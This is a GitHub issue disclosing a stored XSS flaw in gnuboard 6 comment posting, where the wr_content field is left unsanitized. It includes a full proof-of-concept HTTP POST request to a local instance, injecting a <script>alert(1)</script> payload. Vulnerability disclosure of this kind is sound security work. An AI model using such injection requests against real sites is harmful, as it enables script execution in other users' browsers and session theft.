Skip to content

Stored XSS vulnerability due to HTML Escape unprocessed when writing comments #316

New issue
New issue
Closed
Closed
Stored XSS vulnerability due to HTML Escape unprocessed when writing comments#316
Assignees
KimTom89
@mirusu400

Description

@mirusu400
mirusu400
opened on Jan 18, 2024

Hello.

Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.

[Name of affected Product]

gnuboard 6

[Affected version]

58c737a

[Vulnerability Type]

  • Stored XSS

[Root Cause]

  • While writing reply on a post, wr_content parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.

[Attack Vectors]

_2024_01_17_19_33_11_286.mp4

As shown above, it is normally prohibited to enter HTML tags within a web browser, but if you manipulate HTTP requests using proxy tools such as Burp Suite or send web requests directly to the requests library to create comments, the HTML tags are reflected as they are.

This enables Stored XSS attacks by injecting the tag <script>.

The bottom is a PoC Web request.

POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close

w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>

Metadata

Metadata

Assignees

Labels

No labels
No labels

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions